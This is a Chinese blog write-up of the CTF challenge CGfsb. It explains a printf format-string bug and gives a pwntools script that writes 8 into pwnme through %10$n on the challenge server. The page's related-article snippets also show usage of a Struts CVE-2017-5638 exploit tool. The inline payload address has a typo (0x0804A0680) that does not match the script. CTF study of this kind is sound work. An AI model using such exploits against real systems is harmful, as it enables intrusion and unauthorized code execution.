攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解

最新推荐文章于 2023-07-23 15:39:58 发布
最新推荐文章于 2023-07-23 15:39:58 发布
阅读量806 收藏 3
点赞数 2
分类专栏: 攻防世界 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35066257/article/details/101303083
版权

攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解

在开始看这题之前,可以看CTF-wiki中有关格式化字符串漏洞的利用[link]https://wiki.x10sec.org/pwn/fmtstr/fmtstr_exploit/
这边就简单的介绍格式化字符串中覆盖内存的方式:%n$n,这串字符的意思是将前面打印的字符个数,写入到第n个指针对应的地址中,下面就以CGfsb这题来举个例子
查看文件基本信息:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
用ida可以看到当pwnme=8的时候执行system函数,显示出flag。
我们要利用的就是printf((const char *)&message);它没有按照标准格式 printf("<格式化字符串>", <参量表>) ,所以存在格式化字符串漏洞,具体可以参考CTF-wiki的解释
同时也可以通过ida查看pwnme的地址,利用pwnme地址组成payload

接下来要组成payload

通过gdb,利用printf的漏洞,来查看栈中的字符的位置
在这里插入图片描述
当我们输入:message=AAAA %08x %08x %08x %08x %08x %08x %08x ,这里%08x就使输出8位进制地址,由于printf没有格式化字符串,它就会把我们输入的%08x当作格式化字符串,输出栈中的地址,我们可以看到AAAA的16进制数据41414141在栈中第10的位置。我们就可以构造payload

payload=p32(0x0804A0680)+“aaaa”+"%10$n"

解释:
%n$n*,将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置即%10:栈中第10的地址位置
1.p32(0x0804A0680)将pwnme的地址写入,即取代AAAA的位置,同时也代表4个字符
2. ”aaaa"因为pwnme要为8所以添加4个字符

整句payload的意思是写入pwnme的地址,同时利用**%10$n**,将8写入到pwnme的地址。

exp脚本

from pwn import *
io=remote("111.198.29.45","49496")
payload=p32(0x0804A068)+"aaaa"+"%10$n"
io.sendlineafter("please tell me your name:","aaa")
io.sendlineafter("leave your message please",payload)
io.interactive()
追知
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 1583
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
攻防世界 CGfsb
10-03 589
1.目 2.IDA分析 3.流程分析 流程很简单, 输入名字和信息,然后打印刚刚输入的信息出来,如果未初始化的pwnme的值为8,则成功cat flag。这里printf直接把&s打印出来,明显存在格式化字符串漏洞。 解释一下格式化字符串,一般printf的参数是:格式化字符串 + 参数1 + 参数2 ...。如果后面的参数数量对应不上格式化字符串中需要的参数,会自动从栈顶获取对应的参数。如下图: 输入“AAAAAAA%x-%x-%x-%x-%x-%x-%x-%x-%x-%.
攻防世界pwn:Recho.doc
07-13
攻防世界pwn:Recho.doc
攻防世界PWN-CGfsb
Deeeelete的博客
11-12 377
目:CGfsb 先下载附件 先确保本地的python有pwntools模块(pip install pwntools),模块安装后会有一个checksec命令,可以用该命令查看文件的基本信息 1.扔文件进kali,使用checksec 命令查看其具体内容 几个重要参数: Arch 程序架构信息,判断是64位还是32位,exp编写的时候是p64还是p32 RELRO Relocation Read-Onl(RELRO)此项技术主要针对GOT改写的攻击方式,它分成两种,Partial RELRO
攻防世界PWN--CGfsb
Rt1Text的博客
03-27 3345
首先checksec 32位/ 开了 Canary/NX保护 再运行一下 大致就是这个流程 接下来ida里面 分析C代码 分析前先get一下格式化字符串漏洞的基础知识 举3个常见的相关函数 fprintf----prints to a FILE stream printf----prints to the 'stdout' stream sprintf--prints into a string 常见语法 %d---打印 signed int %u---打印 u...
攻防世界详解CGfsb格式化字符串漏洞,欢迎讨论
XDiku的博客
01-11 255
格式化字符串漏洞
攻防世界pwn:forgot.doc
07-13
攻防世界pwn:forgot.doc
level0 -- 攻防世界新手
01-19
来自攻防世界pwn,是一道简单的新手样本目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问漏洞利用问解决链接:...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
《网络与系统攻防技术》实验一:pwn1文件反汇编
最新发布
03-29
《网络与系统攻防技术》实验一:pwn1文件反汇编
[PWN](攻防世界)CGfsb
ljh15937的博客
09-15 216
分析程序漏洞 32位的程序,有 Canary 防护措施,栈不可执行技术 由于没有开启PIE,可以通过格式化字符串漏洞直接修改存在于 .bss 段的 pwnme 变量的值为 8,从而劫持程序执行流,执行system("cat flag);语句,获取 flag 利用程序 from pwn import * context(arch = 'amd64') context(log_level = 'DEBUG') context(terminal = ['deepin-terminal', '-x', '
攻防世界-CGfsb-Writeup
SkYe's Blog
05-15 240
CGfsb [collapse title=“展开查看详情” status=“false”] 考点:写入小数字格式化字符串 完整 exp : from pwn import * context.log_level = ';debug'; p = remote("111.198.29.45",59528) #p = process("./CGfsb") pwnme = 0x0804A068 payload = "%8c%12$n" + p32(pwnme) p.recvuntil("name") p
[攻防世界]CGfsb
逆向萌新的博客
06-20 204
[攻防世界]CGfsb详解
攻防世界greeting-150——进阶格式化字符串
weixin_48066554的博客
05-21 386
也能学东西阿,小孩子不懂事,做着玩的
CGfsb(xctf)
weixin_43868725的博客
05-06 641
0x0 程序保护和流程 保护: 流程: main() 可以明显的发现存在一个格式化字符串漏洞,然后当pwnme这个变量等于8时调用’cat flag’这个命令。又因为程序没有开启pie并且pwnme是全局变量,所以可以通过格式化字符串漏洞pwnme这个变量改为8从而得到flag。 0x1 利用过程 首先先确定偏移量 可以发现偏移量是10,然后查看pwnme变量的地址 将pwnme的值改为...
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 1719
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
XCTF-攻防世界 CGfsb 格式化字符串漏洞
river
07-02 4082
攻防世界-CGfsb-格式化字符串漏洞 参考自 http://geekfz.cn/index.php/2019/06/12/pwn-format/ 程序拿下来丢到IDA F5 int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7Eh] int v5; ...
一天一道ctf之攻防世界-CGfsb
qq_42728977的博客
08-29 349
暑假笼统地学了Pwn,听的迷迷糊糊的,现在拾起来从头学。开始做了,拿到程序扔进IDA。 int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7Eh] int v5; // [esp+22h] [ebp-7Ah] __int16 v6; // [esp...
[攻防世界 pwn]——CGfsb
Y_peak的博客
02-18 170
[攻防世界 pwn]——CGfsb 目地址: https://adworld.xctf.org.cn/ 目: 这是一道简单的格式化字符串, 详情请参考点点我呀,参考就是我 在pwndbg中调试, 偏移为 0xa = 10 exploit from pwn import * #p = process("./e41a0f684d0e497f87bb309f91737e4d") p = remote("111.200.241.244",57659) #gdb.attach(p, "b *0x0
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值